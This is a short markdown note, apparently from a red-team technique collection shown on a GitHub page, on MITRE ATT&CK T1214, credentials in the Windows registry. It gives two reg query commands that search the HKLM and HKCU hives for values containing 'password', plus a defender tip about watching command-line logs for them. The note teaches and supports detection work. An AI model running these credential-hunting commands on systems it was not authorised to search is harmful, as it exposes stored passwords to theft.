Skip to content

Latest commit

 

History

History
30 lines (20 loc) · 661 Bytes

t1214-credentials-in-registry.md

File metadata and controls

30 lines (20 loc) · 661 Bytes
description
Internal recon, hunting for passwords in Windows registry

T1214: Credentials in Registry

Execution

Scanning registry hives for the value password:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

reg query HKLM /f password /t REG_SZ /s
# or
reg query HKCU /f password /t REG_SZ /s

{% endcode-tabs-item %} {% endcode-tabs %}

Observations

As a defender, you may want to monitor commandline argument logs and look for any that include req query and passwordstrings:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1214" %}